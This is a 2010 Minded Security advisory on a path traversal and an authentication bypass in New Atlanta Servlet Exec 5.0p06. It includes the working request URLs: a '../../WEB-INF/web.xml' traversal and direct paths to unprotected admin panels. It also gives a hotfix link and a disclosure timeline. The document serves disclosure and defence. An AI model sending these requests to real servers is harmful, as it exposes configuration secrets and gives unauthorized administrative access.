Minded Security Labs: Advisory #MSA260209
Servlet Exec Multiple Security Issues

Tested Versions: 
  Servlet Exec 5.0p06 on Microsoft IIS 6.0

    
Minded Security ReferenceID:
  MSA260209
   

Credits:
        Discovery by
        Stefano Di Paola and Giorgio Fedon of Minded Security
        Stefano Di Paola stefano.dipaola [_at_] mindedsecurity.com discovered the 
        first issue (Path Traversal) and 
        Giorgio Fedon giorgio.fedon [_at_] mindedsecurity.com discovered the second 
        issue (Authentication Bypass)


Severity: 
        High: Attackers may be able to read application secrets stored in configuration
        files or to bypass authentication on the Servlet Exec administrative interface.


Solution:  
        Update your installation with July 2010 hotfix:
        http://www.newatlanta.com/c/products/servletexec/download/hotfix/showHotfixes


Summary

Minded Security Consultants discovered during a penetration testing activity that 
New Atlanta Servlet Exec may permit to read system configuration files or to get 
access to system information without valid credentials.


Analysis


First Issue: Path Traversal
Minded Security consultants were able to access arbitrary files on servlet exec 
system path by abusing a flaw in the administration help of the ServletExec platform.
Infact, by requesting the following url:

   http://<webserver>/servlet/pagecompile._admin._help._helpContent_xjsp?
page=../../WEB-INF/web.xml

It's possible to download the "web.xml" file of an application.



Second issue: Authentication Bypass
Furthermore we discovered that some functionalities of the Servlet Exec 
Administrative Interface can be accessed without any valid user credential.
By supplying a properly crafted request to the Servlet interface, it's possible 
to have direct access to precompiled JSP pages stored inside the "Servlet Exec 
Admin" package.
The following request will display the login interface:

   http://<webserver>/servlet/pagecompile._admin._login_xjsp

It's very important to observe that a direct access to "Servlet Exec 
Administrative" functionalities, may lead to a full system compromise, if the 
attacker is be able to deploy his own malicious code on the protected environment.
The following request will show the system properties:

   http://<webserver>/servlet/pagecompile._admin._vmSystemProperties_xjsp

Other examples include, for example, the unauthorized access to the 
"Log Configuration":

   http://<webserver>/servlet/pagecompile._admin._SELogging_xjsp

Unauthorized access to Administrative User Management panel:

   http://<webserver>/servlet/pagecompile._admin._userMgt_xjsp

Access to virtual server management:

   http://<webserver>/servlet/pagecompile._admin._virtualServers_xjsp

Access to Admin Optional packages configuration section:

   http://<webserver>/servlet/pagecompile._admin._optionalPackages_xjsp

Access to Data Sources configuration section:

   http://<webserver>/servlet/pagecompile._admin._dataSources_xjsp

Access to Admin Debug configuration section:

   http://<webserver>/servlet/pagecompile._admin._debug_xjsp



Disclosure Timeline

26/02/2009 Issue found
29/04/2010 Reported to Vendor


Disclaimer


The information within this paper may change without notice. Use
of this information constitutes acceptance for use in an AS IS
condition. There are NO warranties with regard to this information.

In no event shall the author be liable for any damages whatsoever 
arising out of or in connection with the use or spread of this 
information.

Any use of this information is at the user's own risk.
Permission is hereby granted for the redistribution of this Alert
electronically. It is not to be edited in any way without express
consent of Minded Security Research Lab. If you wish to reprint the
whole or any part of this Alert in any other medium excluding
electronic medium, please e-mail research_at_mindedsecurity.com 
for permission.



        Copyright (c) 2010 Minded Security, S.r.l..

              All rights reserved worldwide.